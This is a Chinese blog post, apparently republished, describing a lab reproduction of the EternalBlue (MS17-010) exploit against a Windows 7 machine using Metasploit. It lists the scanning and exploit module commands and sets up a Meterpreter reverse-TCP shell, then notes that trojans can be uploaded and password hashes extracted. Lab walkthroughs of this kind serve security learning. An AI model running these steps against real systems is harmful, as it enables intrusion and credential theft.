zoukankan      html  css  js  c++  java
  • 利用metasploit复现永恒之蓝

    环境

    目标机器:windows 7 ,172.16.136.169
    攻击机:安装了Metasploit 的 ubuntu16.04 ,172.16.136.130
    (安装Metasploit:在 Ubuntu 16.04 上安装、使用 Metasploit)

    复现过程

    使用nmap检测是否开放相关端口

    image.png

    使用Metasploit ms17-010模块复现

    1. 查找对应模块
    search ms17-01
    2. 使用探测模块确认是否存在漏洞
    use auxiliary/scanner/smb/smb_ms17_010
    set rhost 172.16.136.169
    run
    3. 使用攻击模块攻击
    use exploit/windows/smb/ms17_010_eternalblue
    4. 使用meterpreter payload
    set payload windows/x64/meterpreter/reverse_tcp
    set rhost 172.16.136.169
    run
    

    这里会使用第一和第二个modules。首先使用第一个探测模块,确认目标机器存在漏洞。

    image.png

    然后使用第二个模块发起攻击,payload选取windows/x64/meterpreter/reverse_tcp ,得到 meterpreter shell
    image.png

    截图目标机器
    截图

    还可以执行文件操作、上传木马、提取windows hash密码等。

  • 相关阅读:
    053-606
    053-605
    1019 General Palindromic Number (20分)
    1208. 翻硬币
    754. 平方矩阵 II
    1346. 回文平方
    680. 剪绳子
    1227. 分巧克力
    756. 蛇形矩阵
    429. 奖学金
  • 原文地址:https://www.cnblogs.com/ffx1/p/12653436.html
Copyright © 2011-2022 走看看